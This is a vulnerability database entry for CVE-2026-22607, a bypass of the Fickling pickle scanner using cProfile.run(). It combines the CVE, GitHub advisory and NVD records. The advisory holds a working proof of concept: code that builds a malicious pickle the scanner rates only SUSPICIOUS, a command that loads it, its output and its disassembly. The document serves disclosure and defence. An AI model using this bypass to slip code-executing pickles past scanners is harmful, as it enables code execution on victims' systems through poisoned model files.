CVE-2026-22607 (GCVE-0-2026-22607)

Vulnerability from cvelistv5 – Published: 2026-01-10 01:35 – Updated: 2026-01-13 21:49

Title

Fickling Blocklist Bypass: cProfile.run()

Summary

Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.

Severity ?

8.9 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

CWE

CWE-184 - Incomplete List of Disallowed Inputs
CWE-502 - Deserialization of Untrusted Data

Assigner

GitHub_M

References

URL

Tags

	https://github.com/trailofbits/fickling/security/…	x_refsource_CONFIRM
	https://github.com/trailofbits/fickling/commit/dc…	x_refsource_MISC
	https://github.com/trailofbits/fickling/releases/…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	trailofbits	fickling	Affected: < 0.1.7

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-22607",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-13T21:49:35.602436Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-13T21:49:38.169Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fickling",
          "vendor": "trailofbits",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.1.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python\u0027s cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling\u0027s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.9,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-184",
              "description": "CWE-184: Incomplete List of Disallowed Inputs",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-10T01:35:04.920Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9"
        },
        {
          "name": "https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43"
        },
        {
          "name": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7"
        }
      ],
      "source": {
        "advisory": "GHSA-p523-jq9w-64x9",
        "discovery": "UNKNOWN"
      },
      "title": "Fickling Blocklist Bypass: cProfile.run()"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-22607",
    "datePublished": "2026-01-10T01:35:04.920Z",
    "dateReserved": "2026-01-07T21:50:39.534Z",
    "dateUpdated": "2026-01-13T21:49:38.169Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-22607\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-10T02:15:49.780\",\"lastModified\":\"2026-01-16T18:58:22.570\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python\u0027s cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling\u0027s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.9,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-184\"},{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:trailofbits:fickling:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.1.7\",\"matchCriteriaId\":\"5E86A331-3CDE-4B67-AE0E-690AF652E670\"}]}]}],\"references\":[{\"url\":\"https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/trailofbits/fickling/releases/tag/v0.1.7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-22607\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-13T21:49:35.602436Z\"}}}], \"references\": [{\"url\": \"https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-13T21:49:27.585Z\"}}], \"cna\": {\"title\": \"Fickling Blocklist Bypass: cProfile.run()\", \"source\": {\"advisory\": \"GHSA-p523-jq9w-64x9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"trailofbits\", \"product\": \"fickling\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.1.7\"}]}], \"references\": [{\"url\": \"https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9\", \"name\": \"https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43\", \"name\": \"https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/trailofbits/fickling/releases/tag/v0.1.7\", \"name\": \"https://github.com/trailofbits/fickling/releases/tag/v0.1.7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python\u0027s cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling\u0027s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-184\", \"description\": \"CWE-184: Incomplete List of Disallowed Inputs\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-10T01:35:04.920Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-22607\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-13T21:49:38.169Z\", \"dateReserved\": \"2026-01-07T21:50:39.534Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-10T01:35:04.920Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-P523-JQ9W-64X9

Vulnerability from github – Published: 2026-01-09 21:04 – Updated: 2026-01-11 14:54

Summary

Fickling Blocklist Bypass: cProfile.run()

Details

Fickling's assessment

cProfile was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43).

Original report

Description

Summary

Fickling versions up to and including 0.1.6 do not treat Python's cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.

If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.

This affects any workflow or product that uses Fickling as a security gate for pickle deserialization.

Details

The cProfile module is missing from fickling's block list of unsafe module imports in fickling/analysis.py. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).

Incriminated source code:

File: fickling/analysis.py
Class: UnsafeImports
Issue: The blocklist does not include cProfile, cProfile.run, or cProfile.runctx

Reference to similar fix:

PR #187 added pty to the blocklist to fix CVE-2025-67748
PR #108 documented the blocklist approach
The same fix pattern should be applied for cProfile

How the bypass works:

Attacker creates a pickle using cProfile.run() in __reduce__
cProfile.run() accepts a Python code string and executes it directly (C-accelerated version of profile.run)
Fickling's UnsafeImports analysis does not flag cProfile as dangerous
Only the UnusedVariables heuristic triggers, resulting in SUSPICIOUS severity
The pickle should be rated OVERTLY_MALICIOUS like os.system, eval, and exec

Tested behavior (fickling 0.1.6):

Function	Fickling Severity	RCE Capable
os.system	LIKELY_OVERTLY_MALICIOUS	Yes
eval	OVERTLY_MALICIOUS	Yes
exec	OVERTLY_MALICIOUS	Yes
cProfile.run	SUSPICIOUS	Yes ← BYPASS
cProfile.runctx	SUSPICIOUS	Yes ← BYPASS

Suggested fix:

Add to the unsafe imports blocklist in fickling/analysis.py: - cProfile - cProfile.run - cProfile.runctx - _lsprof (underlying C module)

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Environment: - Python 3.13.2 - fickling 0.1.6 (latest version, installed via pip)

Step 1: Create malicious pickle

import pickle
import cProfile

class MaliciousPayload:
    def __reduce__(self):
        return (cProfile.run, ("print('CPROFILE_RCE_CONFIRMED')",))

with open("malicious.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)

Step 2: Analyze with fickling

from fickling.fickle import Pickled
from fickling.analysis import check_safety

with open('malicious.pkl', 'rb') as f:
    data = f.read()

pickled = Pickled.load(data)
result = check_safety(pickled)
print(f"Severity: {result.severity}")
print(f"Analysis: {result}")

Expected output (if properly detected):

Severity: Severity.OVERTLY_MALICIOUS

Actual output (bypass confirmed):

Severity: Severity.SUSPICIOUS
Analysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file

Step 3: Prove RCE by loading the pickle

python -c "import pickle; pickle.load(open('malicious.pkl', 'rb'))"

Output

CPROFILE_RCE_CONFIRMED
         4 function calls in 0.000 seconds

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.000    0.000    0.000    0.000 <string>:1(<module>)
        1    0.000    0.000    0.000    0.000 {built-in method builtins.exec}
        1    0.000    0.000    0.000    0.000 {built-in method builtins.print}
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}

Check: The code executes, proving RCE.

Pickle disassembly (evidence):

    0: \x80 PROTO      5
    2: \x95 FRAME      58
   11: \x8c SHORT_BINUNICODE 'cProfile'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'run'
   27: \x94 MEMOIZE    (as 1)
   28: \x93 STACK_GLOBAL
   29: \x94 MEMOIZE    (as 2)
   30: \x8c SHORT_BINUNICODE "print('CPROFILE_RCE_CONFIRMED')"
   63: \x94 MEMOIZE    (as 3)
   64: \x85 TUPLE1
   65: \x94 MEMOIZE    (as 4)
   66: R    REDUCE
   67: \x94 MEMOIZE    (as 5)
   68: .    STOP
highest protocol among opcodes = 4

Impact

Vulnerability Type:

Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).

Who is impacted:

Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes: - ML model validation pipelines - Model hosting platforms (Hugging Face, MLflow, etc.) - Security scanning tools that use fickling - CI/CD pipelines that validate pickle artifacts

Attack scenario:

An attacker uploads a malicious ML model or pickle file to a model repository. The victim's pipeline uses fickling to scan uploads. Fickling rates the file as "SUSPICIOUS" (not "OVERTLY_MALICIOUS"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.

Why cProfile.run() is dangerous:

Unlike runpy.run_path() which requires a file on disk, cProfile.run() takes a code string directly. This means the entire attack is self-contained in the pickle - no external files needed. Python docs explicitly state that cProfile.run() takes "a single argument that can be passed to the exec() function".

cProfile is the C-accelerated version and is more commonly available than profile. It's also the recommended profiler per Python docs ("cProfile is recommended for most users"), so it's present in virtually all Python installations.

Severity: HIGH

The attacker achieves arbitrary code execution
The security control (fickling) is specifically designed to prevent this
The bypass requires no special conditions beyond crafting the pickle with cProfile
Attack is fully self-contained (no external files needed)
cProfile is more commonly used than profile, increasing attack surface

Severity ?

8.9 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "fickling"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22607"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-09T21:04:22Z",
    "nvd_published_at": "2026-01-10T02:15:49Z",
    "severity": "HIGH"
  },
  "details": "# Fickling\u0027s assessment\n\n`cProfile` was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43).\n\n# Original report\n\n## Description\n\n### Summary\n\nFickling versions up to and including 0.1.6 do not treat Python\u0027s `cProfile` module as unsafe. Because of this, a malicious pickle that uses `cProfile.run()` is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.\n\nIf a user relies on Fickling\u0027s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.\n\nThis affects any workflow or product that uses Fickling as a security gate for pickle deserialization.\n\n### Details\n\nThe `cProfile` module is missing from fickling\u0027s block list of unsafe module imports in `fickling/analysis.py`. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).\n\nIncriminated source code:\n\n- File: `fickling/analysis.py`\n- Class: `UnsafeImports`\n- Issue: The blocklist does not include `cProfile`, `cProfile.run`, or `cProfile.runctx`\n\nReference to similar fix:\n\n- PR #187 added `pty` to the blocklist to fix CVE-2025-67748\n- PR #108 documented the blocklist approach\n- The same fix pattern should be applied for `cProfile`\n\nHow the bypass works:\n\n1. Attacker creates a pickle using `cProfile.run()` in `__reduce__`\n2. `cProfile.run()` accepts a Python code string and executes it directly (C-accelerated version of profile.run)\n3. Fickling\u0027s `UnsafeImports` analysis does not flag `cProfile` as dangerous\n4. Only the `UnusedVariables` heuristic triggers, resulting in SUSPICIOUS severity\n5. The pickle should be rated OVERTLY_MALICIOUS like `os.system`, `eval`, and `exec`\n\nTested behavior (fickling 0.1.6):\n\n| Function | Fickling Severity | RCE Capable |\n|----------|-------------------|-------------|\n| os.system | LIKELY_OVERTLY_MALICIOUS | Yes |\n| eval | OVERTLY_MALICIOUS | Yes |\n| exec | OVERTLY_MALICIOUS | Yes |\n| cProfile.run | SUSPICIOUS | Yes \u2190 BYPASS |\n| cProfile.runctx | SUSPICIOUS | Yes \u2190 BYPASS |\n\nSuggested fix:\n\nAdd to the unsafe imports blocklist in `fickling/analysis.py`:\n- `cProfile`\n- `cProfile.run`\n- `cProfile.runctx`\n- `_lsprof` (underlying C module)\n\n## PoC\n\nComplete instructions, including specific configuration details, to reproduce the vulnerability.\n\nEnvironment:\n- Python 3.13.2\n- fickling 0.1.6 (latest version, installed via pip)\n\n### Step 1: Create malicious pickle\n\n```python\nimport pickle\nimport cProfile\n\nclass MaliciousPayload:\n    def __reduce__(self):\n        return (cProfile.run, (\"print(\u0027CPROFILE_RCE_CONFIRMED\u0027)\",))\n\nwith open(\"malicious.pkl\", \"wb\") as f:\n    pickle.dump(MaliciousPayload(), f)\n```\n\n### Step 2: Analyze with fickling\n\n```python\nfrom fickling.fickle import Pickled\nfrom fickling.analysis import check_safety\n\nwith open(\u0027malicious.pkl\u0027, \u0027rb\u0027) as f:\n    data = f.read()\n\npickled = Pickled.load(data)\nresult = check_safety(pickled)\nprint(f\"Severity: {result.severity}\")\nprint(f\"Analysis: {result}\")\n```\n\nExpected output (if properly detected):\n```\nSeverity: Severity.OVERTLY_MALICIOUS\n```\n\nActual output (bypass confirmed):\n```\nSeverity: Severity.SUSPICIOUS\nAnalysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file\n```\n\n### Step 3: Prove RCE by loading the pickle\n\n```bash\npython -c \"import pickle; pickle.load(open(\u0027malicious.pkl\u0027, \u0027rb\u0027))\"\n```\n\nOutput\n```\nCPROFILE_RCE_CONFIRMED\n         4 function calls in 0.000 seconds\n\n   Ordered by: standard name\n\n   ncalls  tottime  percall  cumtime  percall filename:lineno(function)\n        1    0.000    0.000    0.000    0.000 \u003cstring\u003e:1(\u003cmodule\u003e)\n        1    0.000    0.000    0.000    0.000 {built-in method builtins.exec}\n        1    0.000    0.000    0.000    0.000 {built-in method builtins.print}\n        1    0.000    0.000    0.000    0.000 {method \u0027disable\u0027 of \u0027_lsprof.Profiler\u0027 objects}\n```\n\nCheck: The code executes, proving RCE.\n\n### Pickle disassembly (evidence):\n\n```\n    0: \\x80 PROTO      5\n    2: \\x95 FRAME      58\n   11: \\x8c SHORT_BINUNICODE \u0027cProfile\u0027\n   21: \\x94 MEMOIZE    (as 0)\n   22: \\x8c SHORT_BINUNICODE \u0027run\u0027\n   27: \\x94 MEMOIZE    (as 1)\n   28: \\x93 STACK_GLOBAL\n   29: \\x94 MEMOIZE    (as 2)\n   30: \\x8c SHORT_BINUNICODE \"print(\u0027CPROFILE_RCE_CONFIRMED\u0027)\"\n   63: \\x94 MEMOIZE    (as 3)\n   64: \\x85 TUPLE1\n   65: \\x94 MEMOIZE    (as 4)\n   66: R    REDUCE\n   67: \\x94 MEMOIZE    (as 5)\n   68: .    STOP\nhighest protocol among opcodes = 4\n```\n\n## Impact\n\nVulnerability Type:\n\nIncomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).\n\nWho is impacted:\n\nAny user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:\n- ML model validation pipelines\n- Model hosting platforms (Hugging Face, MLflow, etc.)\n- Security scanning tools that use fickling\n- CI/CD pipelines that validate pickle artifacts\n\nAttack scenario:\n\nAn attacker uploads a malicious ML model or pickle file to a model repository. The victim\u0027s pipeline uses fickling to scan uploads. Fickling rates the file as \"SUSPICIOUS\" (not \"OVERTLY_MALICIOUS\"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.\n\nWhy cProfile.run() is dangerous:\n\nUnlike `runpy.run_path()` which requires a file on disk, `cProfile.run()` takes a code string directly. This means the entire attack is self-contained in the pickle - no external files needed. Python docs explicitly state that `cProfile.run()` takes \"a single argument that can be passed to the exec() function\".\n\n`cProfile` is the C-accelerated version and is more commonly available than `profile`. It\u0027s also the recommended profiler per Python docs (\"cProfile is recommended for most users\"), so it\u0027s present in virtually all Python installations.\n\nSeverity: HIGH\n\n- The attacker achieves arbitrary code execution\n- The security control (fickling) is specifically designed to prevent this\n- The bypass requires no special conditions beyond crafting the pickle with cProfile\n- Attack is fully self-contained (no external files needed)\n- cProfile is more commonly used than profile, increasing attack surface",
  "id": "GHSA-p523-jq9w-64x9",
  "modified": "2026-01-11T14:54:55Z",
  "published": "2026-01-09T21:04:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-r7v6-mfhq-g3m2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22607"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/108"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/187"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/195"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trailofbits/fickling"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L116"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Fickling Blocklist Bypass: cProfile.run()"
}

FKIE_CVE-2026-22607

Vulnerability from fkie_nvd - Published: 2026-01-10 02:15 - Updated: 2026-01-16 18:58

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43	Patch
security-advisories@github.com	https://github.com/trailofbits/fickling/releases/tag/v0.1.7	Release Notes
security-advisories@github.com	https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/trailofbits/fickling/security/advisories/GHSA-p523-jq9w-64x9	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	trailofbits	fickling	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:trailofbits:fickling:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E86A331-3CDE-4B67-AE0E-690AF652E670",
              "versionEndExcluding": "0.1.7",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Fickling is a Python pickling decompiler and static analyzer. Fickling versions up to and including 0.1.6 do not treat Python\u0027s cProfile module as unsafe. Because of this, a malicious pickle that uses cProfile.run() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling\u0027s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization. This issue has been patched in version 0.1.7."
    }
  ],
